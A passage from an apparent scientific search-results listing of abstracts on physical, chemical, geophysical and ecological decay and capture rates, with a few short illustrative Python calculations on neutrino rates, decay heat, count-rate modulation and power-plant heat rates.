and vector photon models the analytical expressions for the initial cooperative decay rate and the cooperative Lamb shift for an ensemble of resonant atoms distributed uniformly in an infinite cylindrical geometry for the case that the initial state of the system is prepared in a phased state modulated in the direction of the cylindrical axis. We find that qualitatively the scalar and vector theories give different results. 9. Measurement of HOx• production rate due to radon decay in air SciTech Connect Ding, Huiling 1993-08-01 Radon in indoor air may cause the exposure of the public to excessive radioactivity. Radiolysis of water vapor in indoor air due to radon decay could produce (•OH and HO2 •) that may convert atmospheric constituents to compounds of lower vapor pressure. These lower vapor pressure compounds might then nucleate to form new particles in the indoor atmosphere. Chemical amplification was used to determine HOx• production rate in indoor air caused by radon decay. Average HOx• production rate was found to be (4.31±0.07) x 105 HOx• per Rn decay per second (Bq) 3.4 to 55.0% at 22C. This work provided G(HOx•)-value, 7.86±0.13 No./100 eV in air by directly measuring [HOx•] formed from the radiolysis procedure. This G value implies that HOx• produced by radon decay in air might be formed by multiple processes and may be result of positive ion-molecule reactions, primary radiolysis, and radical reactions. There is no obvious relation between HOx• production rate and relative humidity. A laser-induced fluorescence (LIF) system has been used for •OH production rate measurement; it consists of an excimer laser, a dye laser, a frequency doubler, a gaseous fluorescence chamber, and other optical and electronic parts. 
This system needs to be improved to eliminate the interferences of light scattering and artificial •OH produced from the photolysis of O3/H2O. 10. Measurement of the decay rate of single-frequency perturbations on blast waves. PubMed Edens, A D; Ditmire, T; Hansen, J F; Edwards, M J; Adams, R G; Rambo, P K; Ruggles, L; Smith, I C; Porter, J L 2005-12-09 To explore the validity of theories forwarded to explain the dynamics of hydrodynamic perturbations on high Mach number blast waves, we have studied the decay rate of perturbations on blast waves traveling through nitrogen gas. In our experiments, 1 kJ pulses from the Z-Beamlet laser at Sandia National Laboratories illuminated solid targets immersed in gas and created blast waves. The polytropic index implied by comparing experiment to theoretical predictions is compared to simulation results. 11. Excitonic coupling effect on the nonradiative decay rate in molecular aggregates: Formalism and application Li, Wenqiang; Zhu, Lili; Shi, Qiang; Ren, Jiajun; Peng, Qian; Shuai, Zhigang 2017-09-01 We present here an analytical thermal vibration correlation function formalism to calculate the nonradiative decay rate constant (knr) considering excitonic coupling effect (ECE) for molecular aggregates based on split-operator approximation. Combining with first-principles calculations, we found that knr is enhanced by ECE for both H- and J-aggregates. In addition, ECE is found to be minor for the AIEgens (aggregation-induced emission luminogens). 12. Estimation of HF artificial ionospheric turbulence characteristics using comparison of calculated plasma wave decay rates with the measured decay rates of the stimulated electromagnetic emission Bareev, D. D.; Gavrilenko, V. G.; Grach, S. M.; Sergeev, E. N. 2016-02-01 It is shown experimentally that the relaxation time of the stimulated electromagnetic emission (SEE) after the pump wave turn off decreases when frequency of the electromagnetic wave, responsible for the SEE generation (pump wave f0 or diagnostic wave fdw) approaches 4th harmonic of the electron cyclotron frequency fce . Since the SEE relaxation is determined by the damping rate of plasma waves with the same frequency, responsible for the SEE generation, we calculated damping rates of plasma waves with ω ∼ωuh (ω is the plasma wave frequency, ωuh is the upper hybrid frequency) for frequencies close to and distant from the double resonance where ωuh ∼ 4ωce (ωce = 2 πfce). The calculations were performed numerically on the base of linear plasma wave dispersion relation at arbitrary ratio between | Δ | = ω - 4ωce and |k‖ |VTe (VTe is the electron thermal speed and k‖ is the projection of the wave vector onto the magnetic field direction. A comparison of calculation and experimental results has shown that obtained frequency dependence of the SEE decay rate is similar to the damping rate frequency dependence for plasma waves with wave vectors directed at the angles 60-70° to the magnetic field, and gives a strong hint that oblique upper hybrid plasma waves should be responsible for the SEE generation. 13. Nonequilibrium capture rates induce protein accumulation and enhanced adsorption to solid-state nanopores. PubMed Freedman, Kevin J; Haq, Syed Raza; Fletcher, Michael R; Foley, Joe P; Jemth, Per; Edel, Joshua B; Kim, Min Jun 2014-12-23 Single molecule capturing of analytes using an electrically biased nanopore is the fundamental mechanism in which nearly all nanopore experiments are conducted. 
With pore dimensions being on the order of a single molecule, the spatial zone of sensing only contains approximately a zeptoliter of volume. As a result, nanopores offer high precision sensing within the pore but provide little to no information about the analytes outside the pore. In this study, we use capture frequency and rate balance theory to predict and study the accumulation of proteins at the entrance to the pore. Protein accumulation is found to have positive attributes such as capture rate enhancement over time but can additionally lead to negative effects such as long-term blockages typically attributed to protein adsorption on the surface of the pore. Working with the folded and unfolded states of the protein domain PDZ2 from SAP97, we show that applying short (e.g., 3-25 s in duration) positive voltage pulses, rather than a constant voltage, can prevent long-term current blockades (i.e., adsorption events). By showing that the concentration of proteins around the pore can be controlled in real time using modified voltage protocols, new experiments can be explored which study the role of concentration on single molecular kinetics including protein aggregation, folding, and protein binding. 14. Radiative decay rate of excitons in square quantum wells: Microscopic modeling and experiment SciTech Connect Khramtsov, E. S.; Grigoryev, P. S.; Ignatiev, I. V.; Verbin, S. Yu.; Belov, P. A. Efimov, Yu. P.; Eliseev, S. A.; Lovtcius, V. A.; Petrov, V. V.; Yakovlev, S. L. 2016-05-14 The binding energy and the corresponding wave function of excitons in GaAs-based finite square quantum wells (QWs) are calculated by the direct numerical solution of the three-dimensional Schrödinger equation. The precise results for the lowest exciton state are obtained by the Hamiltonian discretization using the high-order finite-difference scheme. The microscopic calculations are compared with the results obtained by the standard variational approach. The exciton binding energies found by two methods coincide within 0.1 meV for the wide range of QW widths. The radiative decay rate is calculated for QWs of various widths using the exciton wave functions obtained by direct and variational methods. The radiative decay rates are confronted with the experimental data measured for high-quality GaAs/AlGaAs and InGaAs/GaAs QW heterostructures grown by molecular beam epitaxy. The calculated and measured values are in good agreement, though slight differences with earlier calculations of the radiative decay rate are observed. 15. Direct Measurement of the Unimolecular Decay Rate of Criegee Intermediates to OH Products Liu, Fang; Fang, Yi; Klippenstein, Stephen; McCoy, Anne; Lester, Marsha Ozonolysis of alkenes is an important non-photolytic source of OH radicals in the troposphere. The production of OH radicals proceeds though formation and unimolecular decay of Criegee intermediates such as syn-CH3CHOO and (CH3)2COO. These alkyl-substituted Criegee intermediates can undergo a 1,4-H transfer reaction to form an energized vinyl hydroperoxide species, which breaks apart to OH and vinoxy products. Recently, this laboratory used IR excitation in the C-H stretch overtone region to initiate the unimolecular decay of syn-CH3CHOO and (CH3)2COO Criegee intermediates, leading to OH formation. Here, direct time-domain measurements are performed to observe the rate of appearance of OH products under collision-free conditions utilizing UV laser-induced fluorescence for detection. 
The experimental rates are in excellent agreement with statistical RRKM calculations using barrier heights predicted from high-level electronic structure calculations. Accurate determination of the rates and barrier heights for unimolecular decay of Criegee intermediates is essential for modeling the kinetics of alkene ozonolysis reactions, a significant OH radical source in atmospheric chemistry, as well as the steady-state concentration of Criegee intermediates in the atmosphere. This research was supported through the National Science Foundation under grant CHE-1362835. 16. Assessment of the rates of injury and mortality in waterfowl captured with five methods of capture and techniques for minimizing risks. PubMed O'Brien, Michelle F; Lee, Rebecca; Cromie, Ruth; Brown, Martin J 2016-04-01 Swan pipes, duck decoys, cage traps, cannon netting, and roundups are widely used to capture waterfowl in order to monitor populations. These methods are often regulated in countries with national ringing or banding programs and are considered to be safe, and thus justifiable given the benefits to conservation. However, few published studies have addressed how frequently injuries and mortalities occur, or the nature of any injuries. In the present study, rates of mortality and injury during captures with the use of these methods carried out by the Wildfowl & Wetlands Trust as part of conservation programs were assessed. The total rate of injury (including mild dermal abrasions) was 0.42% across all species groups, whereas total mortality was 0.1% across all capture methods. Incidence of injury varied among species groups (ducks, geese, swans, and rails), with some, for example, dabbling ducks, at greater risk than others. We also describe techniques used before, during, and after a capture to reduce stress and injury in captured waterfowl. Projects using these or other capture methods should monitor and publish their performance to allow sharing of experience and to reduce risks further. 17. Measurement of the solar neutrino capture rate with gallium metal, part III SciTech Connect Elliott, Steven Ray 2008-01-01 The Russian-American experiment SAGE began to measure the solar neutrino capture rate with a target of gallium metal in December 1989. Measurements have continued with only a few brief interruptions since that time. In this article we present the experimental improvements in SAGE since its last published data summary in December 2001. Assuming the solar neutrino production rate was constant during the period of data collection, combined analysis of 168 extractions through December 2007 gives a capture rate of solar neutrinos with energy above 233 keV of 65.4 +3.1/-3.0 (stat) +2.6/-2.8 (syst) SNU. The weighted average of the results of all three Ga solar neutrino experiments, SAGE, Gallex, and GNO, is now 66.1 ± 3.1 SNU, where statistical and systematic uncertainties have been combined in quadrature. During the recent period of data collection a new test of SAGE was made with a reactor-produced 37Ar neutrino source. The ratio of observed to calculated rates in this experiment, combined with the measured rates in the three prior 51Cr neutrino-source experiments with Ga, is 0.88 ± 0.05. A probable explanation for this low result is that the cross section for neutrino capture by the two lowest-lying excited states in 71Ge has been overestimated.
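The 66.1 ± 3.1 SNU figure quoted above is an inverse-variance weighted mean in which each experiment's statistical and systematic uncertainties are first combined in quadrature. A minimal sketch of that combination procedure follows; the SAGE entry uses the (symmetrized) values from the abstract, while the other two entries are placeholders rather than the published Gallex and GNO results.

```python
import math

# Inverse-variance weighted mean with statistical and systematic uncertainties
# combined in quadrature, as described in the SAGE abstract above.
measurements = [
    ("SAGE",         65.4, 3.05, 2.7),   # rate [SNU], stat, syst (symmetrized from the abstract)
    ("experiment B", 70.0, 5.0,  3.0),   # placeholder, not the published Gallex result
    ("experiment C", 63.0, 5.0,  3.0),   # placeholder, not the published GNO result
]

def combine(results):
    """Weighted mean and its uncertainty, with weights = 1/sigma_total^2."""
    weights, values = [], []
    for name, rate, stat, syst in results:
        sigma = math.hypot(stat, syst)       # quadrature sum of stat and syst
        weights.append(1.0 / sigma ** 2)
        values.append(rate)
    mean = sum(w * v for w, v in zip(weights, values)) / sum(weights)
    err = 1.0 / math.sqrt(sum(weights))
    return mean, err

mean, err = combine(measurements)
print(f"combined capture rate = {mean:.1f} ± {err:.1f} SNU (illustrative)")
```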
If we assume these cross sections are zero, then the standard solar model including neutrino oscillations predicts a total capture rate in Ga in the range of 63-67 SNU with an uncertainty of about 5%, in good agreement with experiment. We derive the current value of the pp neutrino flux produced in the Sun to be φ_pp^⊙ = (6.1 ± 0.8) × 10^10/(cm^2 s), which agrees well with the flux predicted by the standard solar model. Finally, we make several tests and show that the data are consistent with the assumption that the solar neutrino production rate is constant in time. 18. Stellar electron capture rates on neutron-rich nuclei and their impact on stellar core collapse 2017-02-01 During the late stages of gravitational core-collapse of massive stars, extreme isospin asymmetries are reached within the core. Due to the lack of microscopic calculations of electron-capture (EC) rates for all relevant nuclei, in general simple analytic parametrizations are employed. We study here several extensions of these parametrizations, allowing for a temperature, electron density, and isospin dependence as well as for odd-even effects. The latter extra degrees of freedom considerably improve the agreement with large-scale microscopic rate calculations. We find, in particular, that the isospin dependence leads to a significant reduction of the global EC rates during core collapse with respect to fiducial results, where rates optimized on calculations of stable fp-shell nuclei are used. Our results indicate that systematic microscopic calculations and experimental measurements in the N ≈ 50 neutron-rich region are desirable for realistic simulations of the core collapse. 19. Electron capture and positron decay of 206Fr and 208Fr and the energy levels of 206Rn and 208Rn SciTech Connect Ritchie, B.G.; Avignone, F.T. III; Carter, H.K.; Mlekodaj, R.L.; Spejewski, E.H. 1981-04-01 The isotopes 206Fr and 208Fr were produced by the reactions Ir(20Ne,xn)206,208Fr and mass separated on-line. The electron-capture and positron decays to 206Rn and 208Rn were studied by collecting γ-ray and internal-conversion-electron singles spectra as a function of decay time, as well as γ-γ, γ-e-, and γ-x-ray coincidence spectra. The energies and many of the spins were determined for 18 excited even-parity states in 208Rn and for 10 excited even-parity states in 206Rn. These nuclei appear to be excellent candidates for interpretation in terms of a weak coupling shell model. The energy levels were also compared to the predictions of the interacting boson approximation model. 20. Radionuclide mass inventory, activity, decay heat, and dose rate parametric data for TRIGA spent nuclear fuels SciTech Connect Sterbentz, J.W. 1997-03-01 Parametric burnup calculations are performed to estimate radionuclide isotopic mass and activity concentrations for four different Training, Research, and Isotope General Atomics (TRIGA) nuclear reactor fuel element types: (1) Aluminum-clad standard, (2) Stainless Steel-clad standard, (3) High-enrichment Fuel Life Improvement Program (FLIP), and (4) Low-enrichment Fuel Life Improvement Program (FLIP-LEU-1). Parametric activity data are tabulated for 145 important radionuclides that can be used to generate gamma-ray emission source terms or provide mass quantity estimates as a function of decay time.
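Tabulating activity and decay heat as a function of decay time, as described for the TRIGA inventories above, amounts to applying the exponential decay law nuclide by nuclide and summing the energy release. The sketch below illustrates the bookkeeping only; the half-lives are standard values, but the initial activities and mean energies per decay are placeholders, not data from the report.

```python
import math

# Toy radionuclide inventory: (name, half-life [yr], initial activity [Bq],
# mean energy deposited per decay [MeV]).  Half-lives are standard values;
# activities and mean energies here are placeholders, not data from the report.
inventory = [
    ("Cs-137", 30.1, 1.0e12, 0.8),
    ("Sr-90",  28.8, 8.0e11, 1.1),
    ("Co-60",  5.27, 5.0e11, 2.8),
]

MEV_TO_J = 1.602e-13  # joules per MeV

def activity(a0, half_life_yr, t_yr):
    """Radioactive decay: A(t) = A0 * exp(-ln2 * t / t_half)."""
    return a0 * math.exp(-math.log(2) * t_yr / half_life_yr)

def decay_heat_watts(t_yr):
    """Total decay heat = sum over nuclides of activity * energy per decay."""
    return sum(activity(a0, t12, t_yr) * e_mev * MEV_TO_J
               for _, t12, a0, e_mev in inventory)

for t in (0, 1, 5, 10, 20):
    print(f"t = {t:>2} yr : decay heat ≈ {decay_heat_watts(t):.3f} W")
```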
Fuel element decay heats and dose rates are also presented parametrically as a function of burnup and decay time. Dose rates are given at the fuel element midplane for contact, 3.0-foot, and 3.0-meter detector locations in air. The data herein are estimates based on specially derived Beginning-of-Life (BOL) neutron cross sections using geometrically explicit TRIGA reactor core models. The calculated parametric data should represent good estimates relative to actual values, although no experimental data were available for direct comparison and validation. However, because the cross sections were not updated as a function of burnup, the actinide concentrations may deviate from the actual values at the higher burnups. 1. Nuclear mass inventory, photon dose rate and thermal decay heat of spent research reactor fuel assemblies SciTech Connect Pond, R.B.; Matos, J.E. 1996-12-31 This document has been prepared to assist research reactor operators possessing spent fuel containing enriched uranium of United States origin to prepare part of the documentation necessary to ship this fuel to the United States. Data are included on the nuclear mass inventory, photon dose rate, and thermal decay heat of spent research reactor fuel assemblies. Isotopic masses of U, Np, Pu and Am that are present in spent research reactor fuel are estimated for MTR, TRIGA and DIDO-type fuel assembly types. The isotopic masses of each fuel assembly type are given as functions of U-235 burnup in the spent fuel, and of initial U-235 enrichment and U-235 mass in the fuel assembly. Photon dose rates of spent MTR, TRIGA and DIDO-type fuel assemblies are estimated for fuel assemblies with up to 80% U-235 burnup and specific power densities between 0.089 and 2.857 MW/kg 235U, and for fission product decay times of up to 20 years. Thermal decay heat loads are estimated for spent fuel based upon the fuel assembly irradiation history (average assembly power vs. elapsed time) and the spent fuel cooling time. 2. A realistic model of neutrino masses with a large neutrinoless double beta decay rate 2012-05-01 The minimal Standard Model extension with the Weinberg operator does accommodate the observed neutrino masses and mixing, but predicts a neutrinoless double beta (0νββ) decay rate proportional to the effective electron neutrino mass, which can then be arbitrarily small within present experimental limits. However, in general 0νββ decay can have an independent origin and be near its present experimental bound, whereas neutrino masses are generated radiatively, contributing negligibly to 0νββ decay. We provide a realization of this scenario in a simple, well-defined and testable model, with potential LHC effects and calculable neutrino masses, whose two-loop expression we derive exactly. We also discuss the connection of this model to others that have appeared in the literature, and remark on the significant differences that result from various choices of quantum number assignments and symmetry assumptions. In this type of model, lepton flavor violating rates are also preferred to be relatively large, at the reach of foreseen experiments. Interestingly enough, in our model this implies a large third mixing angle, sin^2 θ13 ≳ 0.008, when μ → eee is required to lie below its present experimental limit. 3.
Combined Results on b-Hadron Production Rates and Decay Properties SciTech Connect Su, Dong 2002-09-11 Combined results on b-hadron lifetimes, b-hadron production rates, B_d^0-B̄_d^0 and B_s^0-B̄_s^0 oscillations, the decay width difference between the mass eigenstates of the B_s^0-B̄_s^0 system, the average number of c and c̄ quarks in b-hadron decays, and searches for CP violation in the B_d^0-B̄_d^0 system are presented. They have been obtained from published and preliminary measurements available in Summer 2000 from the ALEPH, CDF, DELPHI, L3, OPAL and SLD Collaborations. These results have been used to determine the parameters of the CKM unitarity triangle. 4. Variation in radical decay rates in epoxy as a function of crosslink density NASA Technical Reports Server (NTRS) Kent, G. M.; Memory, J. M.; Gilbert, R. D.; Fornes, R. E. 1983-01-01 A study was made of the behavior of radicals generated by Co-60 gamma radiation in the epoxy system tetraglycidyl-4,4'-diaminodiphenyl methane (TGDDM) cured with 4,4'-diaminodiphenyl sulfone (DDS). The molar ratio of TGDDM to DDS was varied in the epoxy samples, and they were prepared under the same curing conditions to obtain various extents of crosslinking. ESR spectrometry data suggest that the rate of decay of radicals is related to inhomogeneities in the resin, with radicals in the highly crosslinked regions having long decay times. The inhomogeneities are thought to be due to statistical variation associated with the complex crosslinking reactions or to difficulties in mixing the reactants. 5. Nucleation rates of Lennard-Jones clusters from growth and decay simulations Vehkamäki, Hanna; Ford, Ian J. 2000-08-01 We have studied single clusters of Lennard-Jones atoms using a novel Monte Carlo simulation technique. We computed canonical ensemble averages of the grand canonical growth and decay probabilities of the cluster as a function of the cluster size. The critical size is identified as the one for which growth and decay are equally probable. The size and average internal energy of the critical cluster were found for different temperatures and vapor chemical potentials. We used this information together with nucleation theorems to predict the behavior of the nucleation rate as a function of the two external parameters. Our results are in line with the results found in the literature, and roughly correspond to the predictions of classical theory. 6. Initial colonization, community assembly and ecosystem function: fungal colonist traits and litter biochemistry mediate decay rate. PubMed Cline, Lauren C; Zak, Donald R 2015-10-01 Priority effects are an important ecological force shaping biotic communities and ecosystem processes, in which the establishment of early colonists alters the colonization success of later-arriving organisms via competitive exclusion and habitat modification. However, we do not understand which biotic and abiotic conditions lead to strong priority effects and lasting historical contingencies. Using saprotrophic fungi in a model leaf decomposition system, we investigated whether compositional and functional consequences of initial colonization were dependent on initial colonizer traits, resource availability or a combination thereof.
To test these ideas, we factorially manipulated leaf litter biochemistry and initial fungal colonist identity, quantifying subsequent community composition, using neutral genetic markers, and community functional characteristics, including enzyme potential and leaf decay rates. During the first 3 months, initial colonist respiration rate and physiological capacity to degrade plant detritus were significant determinants of fungal community composition and leaf decay, indicating that rapid growth and lignolytic potential of early colonists contributed to altered trajectories of community assembly. Further, initial colonization on oak leaves generated increasingly divergent trajectories of fungal community composition and enzyme potential, indicating stronger initial colonizer effects on energy-poor substrates. Together, these observations provide evidence that initial colonization effects, and subsequent consequences on litter decay, are dependent upon substrate biochemistry and physiological traits within a regional species pool. Because microbial decay of plant detritus is important to global C storage, our results demonstrate that understanding the mechanisms by which initial conditions alter priority effects during community assembly may be key to understanding the drivers of ecosystem-level processes. © 2015 John Wiley & Sons Ltd. 7. Instrument for precision long-term β-decay rate measurements SciTech Connect Ware, M. J. Bergeson, S. D.; Ellsworth, J. E.; Groesbeck, M.; Hansen, J. E.; Pace, D.; Peatross, J. 2015-07-15 We describe an experimental setup for making precision measurements of relative β-decay rates of {sup 22}Na, {sup 36}Cl, {sup 54}Mn, {sup 60}Co, {sup 90}Sr, {sup 133}Ba, {sup 137}Cs, {sup 152}Eu, and {sup 154}Eu. The radioactive samples are mounted in two automated sample changers that sequentially position the samples with high spatial precision in front of sets of detectors. The set of detectors for one sample changer consists of four Geiger-Müller (GM) tubes and the other set of detectors consists of two NaI scintillators. The statistical uncertainty in the count rate is few times 0.01% per day for the GM detectors and about 0.01% per hour on the NaI detectors. The sample changers, detectors, and associated electronics are housed in a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The apparatus is designed to accumulate statistics over many years in a regulated environment to test recent claims of small annual variations in the decay rates. We demonstrate that absent this environmental regulation, uncontrolled natural atmospheric pressure variations at our location would imprint an annual signal of 0.1% on the Geiger-Müller count rate. However, neither natural pressure variations nor plausible indoor room temperature variations cause a discernible influence on our NaI scintillator detector count rate. 8. Precision long-term measurements of beta-decay-rate ratios in a controlled environment Bergeson, S. D.; Peatross, J.; Ware, M. J. 2017-04-01 We report on measurements of relative beta-decay rates of Na-22, Cl-36, Co-60, Sr-90, Cs-137 monitored for more than one year. The radioactive samples are mounted in an automated sample changer that sequentially positions the five samples in turn, with high spatial precision, in front of each of four Geiger-Müller tubes. 
The sample wheel, detectors, and associated electronics are housed inside a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The statistical uncertainty in the count rate approaches a few times 0.01% with two weeks of averaging. Other sources of error are on a similar scale. The data are analyzed in variety of ways, comparing count rates of the various samples on one or more detectors, and comparing count rates of a particular sample across multiple detectors. We observe no statistically significant variations in the ratios of decay rates, either annual or at higher-frequency, at a level above 0.01%. 9. Instrument for precision long-term β-decay rate measurements. PubMed Ware, M J; Bergeson, S D; Ellsworth, J E; Groesbeck, M; Hansen, J E; Pace, D; Peatross, J 2015-07-01 We describe an experimental setup for making precision measurements of relative β-decay rates of (22)Na, (36)Cl, (54)Mn, (60)Co, (90)Sr, (133)Ba, (137)Cs, (152)Eu, and (154)Eu. The radioactive samples are mounted in two automated sample changers that sequentially position the samples with high spatial precision in front of sets of detectors. The set of detectors for one sample changer consists of four Geiger-Müller (GM) tubes and the other set of detectors consists of two NaI scintillators. The statistical uncertainty in the count rate is few times 0.01% per day for the GM detectors and about 0.01% per hour on the NaI detectors. The sample changers, detectors, and associated electronics are housed in a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The apparatus is designed to accumulate statistics over many years in a regulated environment to test recent claims of small annual variations in the decay rates. We demonstrate that absent this environmental regulation, uncontrolled natural atmospheric pressure variations at our location would imprint an annual signal of 0.1% on the Geiger-Müller count rate. However, neither natural pressure variations nor plausible indoor room temperature variations cause a discernible influence on our NaI scintillator detector count rate. 10. Instrument for precision long-term β-decay rate measurements Ware, M. J.; Bergeson, S. D.; Ellsworth, J. E.; Groesbeck, M.; Hansen, J. E.; Pace, D.; Peatross, J. 2015-07-01 We describe an experimental setup for making precision measurements of relative β-decay rates of 22Na, 36Cl, 54Mn, 60Co, 90Sr, 133Ba, 137Cs, 152Eu, and 154Eu. The radioactive samples are mounted in two automated sample changers that sequentially position the samples with high spatial precision in front of sets of detectors. The set of detectors for one sample changer consists of four Geiger-Müller (GM) tubes and the other set of detectors consists of two NaI scintillators. The statistical uncertainty in the count rate is few times 0.01% per day for the GM detectors and about 0.01% per hour on the NaI detectors. The sample changers, detectors, and associated electronics are housed in a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The apparatus is designed to accumulate statistics over many years in a regulated environment to test recent claims of small annual variations in the decay rates. 
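The annual-variation test described in the instrument papers above comes down to fitting a yearly sinusoid to normalized count-rate ratios and bounding its amplitude. A minimal sketch of such a fit, run here on synthetic ratio data rather than on anything measured by these experiments:

```python
# Minimal sketch of an annual-modulation test on count-rate ratios:
# fit r(t) = a + b*cos(wt) + c*sin(wt) and report the fractional amplitude.
# The "ratios" below are synthetic noise, not data from the instruments above.
import numpy as np

rng = np.random.default_rng(0)
t = np.arange(0.0, 2 * 365.25)                     # elapsed days
ratios = 1.0 + 1e-4 * rng.standard_normal(t.size)  # simulated flat ratio series

w = 2.0 * np.pi / 365.25
design = np.column_stack([np.ones_like(t), np.cos(w * t), np.sin(w * t)])
coef, *_ = np.linalg.lstsq(design, ratios, rcond=None)
a, b, c = coef
amplitude = np.hypot(b, c)
print(f"mean ratio = {a:.6f}, annual modulation = {100 * amplitude / a:.4f}%")
```

With real data one would also propagate the statistical uncertainty of each ratio into an uncertainty on the fitted amplitude before comparing it against the ~0.01% level quoted above.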
We demonstrate that absent this environmental regulation, uncontrolled natural atmospheric pressure variations at our location would imprint an annual signal of 0.1% on the Geiger-Müller count rate. However, neither natural pressure variations nor plausible indoor room temperature variations cause a discernible influence on our NaI scintillator detector count rate. 11. Aftershock decay, productivity, and stress rates in Hawaii: Indicators of temperature and stress from magma sources USGS Publications Warehouse Klein, Fred W.; Wright, Tom; Nakata, Jennifer 2006-01-01 We examined dozens of aftershock sequences in Hawaii in terms of Gutenberg-Richter and modified Omori law parameters. We studied p, the rate of aftershock decay; Ap, the aftershock productivity, defined as the observed divided by the expected number of aftershocks; and c, the time delay when aftershock rates begin to fall. We found that for earthquakes shallower than 20 km, p values >1.2 are near active magma centers. We associate this high decay rate with higher temperatures and faster stress relaxation near magma reservoirs. Deep earthquakes near Kilauea's inferred magma transport path show a range of p values, suggesting the absence of a large, deep magma reservoir. Aftershock productivity is >4.0 for flank earthquakes known to be triggered by intrusions but is normal (0.25 to 4.0) for isolated main shocks. We infer that continuing, post-main shock stress from the intrusion adds to the main shock's stress step and causes higher Ap. High Ap in other zones suggests less obvious intrusions and pulsing magma pressure near Kilauea's feeding conduit. We calculate stress rates and stress rate changes from pre-main shock and aftershock rates. Stress rate increased after many intrusions but decreased after large M7–8 earthquakes. Stress rates are highest in the seismically active volcano flanks and lowest in areas far from volcanic centers. We found sequences triggered by intrusions tend to have high Ap, high (>0.10 day) c values, a stress rate increase, and sometimes a peak in aftershock rate hours after the main shock. We interpret these values as indicating continuing intrusive stress after the main shock. 12. On the Fourier spectrum analysis of the solar neutrino capture rate Haubold, H. J.; Gerth, E. 1990-06-01 Periodic variations in Davis' experimental data concerning the solar neutrino capture rate are derived on the basis of a Fourier spectrum analysis. Variations in the Ar-37 production rate are obtained for a series of randomly spaced observations in the period 1970-1985 (runs 18-89). The harmonic analysis of runs 18-89 has determined solar neutrino capture rate variations with periods of 8.33, 5.00, 2.13, 1.61, 0.83, 0.61, 0.54, and 0.51 yr, thereby confirming earlier calculations performed for the set of runs 18-69 (1983), 18.74 (1985a), and 18-80 (1985b). The results also confirm those of Sakurai (1979) who showed that there is strong evidence that the observed solar neutrino flux has a tendency to vary with quasi-biennial periodicity. It is shown that the results of the Fourier spectrum analysis do not depend upon certain high or low values in Davis' experimental data. 13. Radiative and nonradiative spontaneous decay rates for an electric quadrupole source in the vicinity of a spherical particle SciTech Connect Guzatov, D. V. 
2016-04-15 Analytic expressions for the radiative and nonradiative decay rates for an electric quadrupole source (atom, molecule) in the vicinity of a spherical particle (dielectric, metal) have been derived and analyzed within classical electrodynamics. It has been shown that the highest increase in the decay rates appears in the quasi-static case, when the wavelength of the transition in question is much larger than the characteristic size of the system formed by the particle and the quadrupole. Asymptotic expressions for the decay rates have been derived for this case. 14. Decay rate of critical fluctuations in ethane+carbon dioxide mixtures near the critical line including the critical azeotrope SciTech Connect Chang, R.F.; Doiron, T.; Pegg, I.L.; Hanley, H.J.M.; Cezairliyan, A. 1986-03-01 Using the technique of photon correlation spectroscopy we have measured the decay rate of critical fluctuations in mixtures of ethane and carbon dioxide of various compositions, including a near-azeotropic mixture. Our experimental data indicate that there is only one dominant mode of fluctuations and that the decay rate is well described by the predictions of mode-coupling theory with the exponent ν = 0.63 for all compositions. The decay rate, its background contributions, the shear viscosity, and the correlation length for the mixtures appear to interpolate simply between those of ethane and carbon dioxide. 15. Optimal Decay Rate of the Compressible Navier-Stokes-Poisson System in R³ Li, Hai-Liang; Matsumura, Akitaka; Zhang, Guojing 2010-05-01 The compressible Navier-Stokes-Poisson (NSP) system is considered in R³ in the present paper, and the influence of the electric field of the internal electrostatic potential force governed by the self-consistent Poisson equation on the qualitative behavior of solutions is analyzed. It is observed that the rotating effect of the electric field affects the dispersion of fluids and reduces the time decay rate of solutions. Indeed, we show that the density of the NSP system converges to its equilibrium state at the same L²-rate (1+t)^(-3/4) or L∞-rate (1+t)^(-3/2), respectively, as the compressible Navier-Stokes system, but the momentum of the NSP system decays at the L²-rate (1+t)^(-1/4) or L∞-rate (1+t)^(-1), respectively, which is slower than the L²-rate (1+t)^(-3/4) or L∞-rate (1+t)^(-3/2) for the compressible Navier-Stokes system [Duan et al., in Math Models Methods Appl Sci 17:737-758, 2007; Liu and Wang, in Comm Math Phys 196:145-173, 1998; Matsumura and Nishida, in J Math Kyoto Univ 20:67-104, 1980] and the L∞-rate (1+t)^(-p) with p ∈ (1, 3/2) for the irrotational Euler-Poisson system [Guo, in Comm Math Phys 195:249-265, 1998]. These convergence rates are shown to be optimal for the compressible NSP system. 16. Comparing the effectiveness of heat rate improvements in different coal-fired power plants utilizing carbon dioxide capture Walsh, Martin Jeremy New Congressional legislation may soon require coal-fired power generators to pay for their CO2 emissions and capture a minimum level of their CO2 output. Amine-based CO2 capture systems offer plants the most technically proven and commercially feasible option for CO2 capture at this time. However, these systems require a large amount of heat and power to operate. As a result, amine-based CO2 capture systems significantly reduce the net power of any units in which they are installed.
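As a rough illustration of the heat-rate bookkeeping involved (with hypothetical numbers, not values from this thesis): net unit heat rate is fuel heat input divided by net electrical output, so the steam and power drawn by an amine capture system raise NUHR even when gross generation is unchanged.

```python
# Illustrative arithmetic only (hypothetical unit, not data from the study above):
# net unit heat rate (NUHR) = fuel heat input / net electrical output, so the
# parasitic load of a CO2 capture system raises NUHR.
def nuhr(heat_input_mmbtu_per_h, net_power_mw):
    """Net unit heat rate in Btu/kWh."""
    return heat_input_mmbtu_per_h * 1.0e6 / (net_power_mw * 1000.0)

heat_input = 5000.0          # MMBtu/h fuel input (hypothetical)
net_power_base = 500.0       # MW net, no capture (hypothetical)
net_power_capture = 390.0    # MW net after capture parasitic load (hypothetical)

base = nuhr(heat_input, net_power_base)
with_capture = nuhr(heat_input, net_power_capture)
print(f"NUHR without capture: {base:,.0f} Btu/kWh")
print(f"NUHR with capture:    {with_capture:,.0f} Btu/kWh "
      f"(+{100 * (with_capture / base - 1):.1f}%)")
```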
